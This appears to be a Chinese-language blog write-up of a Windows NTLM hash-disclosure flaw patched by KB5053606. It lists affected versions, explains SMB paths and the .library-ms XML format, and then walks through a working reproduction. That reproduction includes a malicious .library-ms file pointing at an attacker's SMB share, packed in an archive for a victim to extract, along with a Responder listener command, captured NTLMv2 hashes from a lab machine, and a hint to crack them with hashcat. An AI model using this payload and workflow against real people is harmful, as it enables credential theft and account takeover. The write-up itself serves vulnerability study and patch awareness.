影响版本

  • Windows 10 Version 1809 for x64-based Systems
  • Windows 10 Version 1809 for 32-bit Systems
  • Windows Server 2025 (Server Core installation)
  • Windows Server 2025
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows 10 Version 1607 for x64-based Systems
  • Windows 10 Version 1607 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 for 32-bit Systems
  • Windows 11 Version 24H2 for x64-based Systems
  • Windows 11 Version 24H2 for ARM64-based Systems
  • Windows Server 2022, 23H2 Edition (Server Core installation)
  • Windows 11 Version 23H2 for x64-based Systems
  • Windows 11 Version 23H2 for ARM64-based Systems
  • Windows 10 Version 22H2 for 32-bit Systems
  • Windows 10 Version 22H2 for ARM64-based Systems
  • Windows 10 Version 22H2 for x64-based Systems
  • Windows 11 Version 22H2 for x64-based Systems
  • Windows 11 Version 22H2 for ARM64-based Systems
  • Windows 10 Version 21H2 for x64-based Systems
  • Windows 10 Version 21H2 for ARM64-based Systems
  • Windows 10 Version 21H2 for 32-bit Systems
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019 (Server Core installation)
  • Windows Server 2019

补丁信息

1
KB5053606

利用概述

通过构造一个恶意的SMB路径的.library-ms文件并诱导受害者解压,在解压过程中,windows文件管理器将自动解析library-ms文件的内容以进行阅览和检索,此时将检索其中的SMB路径,从而触发与目的路径的NTML的认证握手,导致NTLMv2的哈希被泄露,进而被攻击者用于进一步攻击。

SMB

SMB(Server Message Block) 是一种用于在计算机网络中实现文件共享、打印机共享和通信的网络协议

Windows 的标准格式是UNC 路径
1
\\<服务器名或IP地址>\<共享名>\<目录或文件>

在windows的SMB读取过程中,会发送NTLM认证握手

.library-ms

.library-ms 是 Windows 系统中用于管理 “库”(Libraries) 的特殊配置文件。它从 Windows 7 开始引入,用于整合和快速访问用户分散在不同位置的文件(如文档、图片、音乐等)。本质是一个 XML 文件,可以通过文本编辑器(如记事本)查看和编辑。以下是一个文档的示例内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/2009/08/StorageService/Library">
  <name>文档</name>
  <version>1.0</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>shell:::{A8CDFF1C-4878-43BE-B5FD-F8091C1C60D0}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
  • <name>:库的显示名称(如“文档”)。
  • <iconReference>:库的图标来源(如系统 DLL 文件中的图标索引)。
  • <url>:关联的文件夹路径(这里是利用的关键点)。
  • <isDefaultSaveLocation>:是否为默认保存位置。

尝试复现

首先我们需要有一个library-ms的模板,其中url放入的则是目标ip的地址

1
2
3
4
5
6
7
8
9
10
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\ip_address\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

并为其命名,这里的命名是随意的,譬如hacked.library-ms,此时我们将攻击机的ip地址写入后再进行压缩。

紧接着,我们在kali中对其进行监听

1
responder -I eth0 -v

然后对压缩包进行解压,此时我们在攻击机中可以看到已经有了反应

1
2
3
4
5
6
SMB] NTLMv2-SSP Client   : 192.168.80.134
[SMB] NTLMv2-SSP Username : DESKTOP-D4RBES3\yu3
[SMB] NTLMv2-SSP Hash     : yu3::DESKTOP-D4RBES3:128ca242d7dd87d0:626246E5FBB74C638625A07E8400ADFE:01010000000000000007A5D7EE9BDB014E75D8DC02811CEE0000000002000800590042004D004B0001001E00570049004E002D0055004F004F0044004E004E00580057004F004100470004003400570049004E002D0055004F004F0044004E004E00580057004F00410047002E00590042004D004B002E004C004F00430041004C0003001400590042004D004B002E004C004F00430041004C0005001400590042004D004B002E004C004F00430041004C00070008000007A5D7EE9BDB01060004000200000008003xxxxxxxxxxxxxxxxxxx0020000001DA428B46F65565222FC18C404D73517EDBC06783D5A5A4D0900D3599E667450A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00380030002E00310032003800000000000000000000000000                            
[SMB] NTLMv2-SSP Client   : 192.168.80.134
[SMB] NTLMv2-SSP Username : DESKTOP-D4RBES3\yu3
[SMB] NTLMv2-SSP Hash     : yu3::DESKTOP-D4RBES3:f8740cfcfde85a8b:63A96B39B46CFBF239190987CE57680C:01010000000000000007A5D7EE9BDB0138AE6847214CF01200000000xxxxxxxxxx004D004B0001001E00570049004E002D0055004F004F0044004E004E00580057004F004100470004003400570049004E002D0055004F004F0044004E004E00580057004F00410047002E00590042004D004B002E004C004F00430041004C0003001400590042004D004B002E004C004F00430041004C0005001400590042004D004B002E004C004F00430041004C00070008000007A5D7EE9BDB010600040002000000080030003000000000000000010000000020000001DA428B46F65565222FC18C404D73517EDBC06783D5A5A4D0900D3599E667450A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00380030002E00310032003800000000000000000000000000

之后就可以将其放入hashcat进行爆破密码